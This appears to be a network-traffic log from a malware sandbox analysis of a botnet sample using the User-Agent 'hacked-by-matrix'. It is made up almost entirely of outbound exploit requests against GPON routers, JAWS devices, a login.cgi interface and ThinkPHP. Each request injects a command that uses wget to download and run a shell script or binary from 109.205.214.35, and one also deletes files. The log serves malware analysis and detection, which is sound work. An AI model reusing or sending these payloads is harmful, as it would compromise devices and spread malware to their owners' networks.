                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2241192.168.2.1357476118.50.222.178443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888706923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2242192.168.2.1357712212.139.120.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888729095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2243192.168.2.1343890212.174.226.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888772011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2244192.168.2.133704442.38.157.48443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888776064 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2245192.168.2.1333114118.13.3.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888778925 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2246192.168.2.1345794212.140.79.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888794899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2247192.168.2.1342638118.238.179.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888802052 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2248192.168.2.1340260109.24.49.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888820887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2249192.168.2.1339090213.183.200.22880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.325448036 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:47.511049986 CET302INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Server: IntareS-HACL
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2250192.168.2.135712223.210.231.12780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.337281942 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:47.951206923 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:48.141074896 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 38 36 33 34 31 30 36 30 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 38 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;86341060&#46;1710995028&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2251192.168.2.1334158212.47.237.5580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.695523024 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.221359015 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.380906105 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2252192.168.2.134693089.168.122.19780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.715398073 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2253192.168.2.1347024212.237.200.7780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.720577955 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.914326906 CET292INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2254192.168.2.1340582212.150.186.22480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.751935959 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.971606016 CET435INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:36:11 GMT
                                                        Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2255192.168.2.134040095.100.62.6980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.752002954 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.936320066 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 35 31 36 31 35 30 32 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 37 26 23 34 36 3b 66 63 37 63 66 66 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;25161502&#46;1710995027&#46;fc7cff2</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2256192.168.2.135489895.217.215.13080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.758948088 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.365485907 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.973500013 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:49.164431095 CET40INHTTP/1.1 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2257192.168.2.135450295.214.134.3080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.766999960 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.405385971 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.612539053 CET932INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 681
                                                        date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 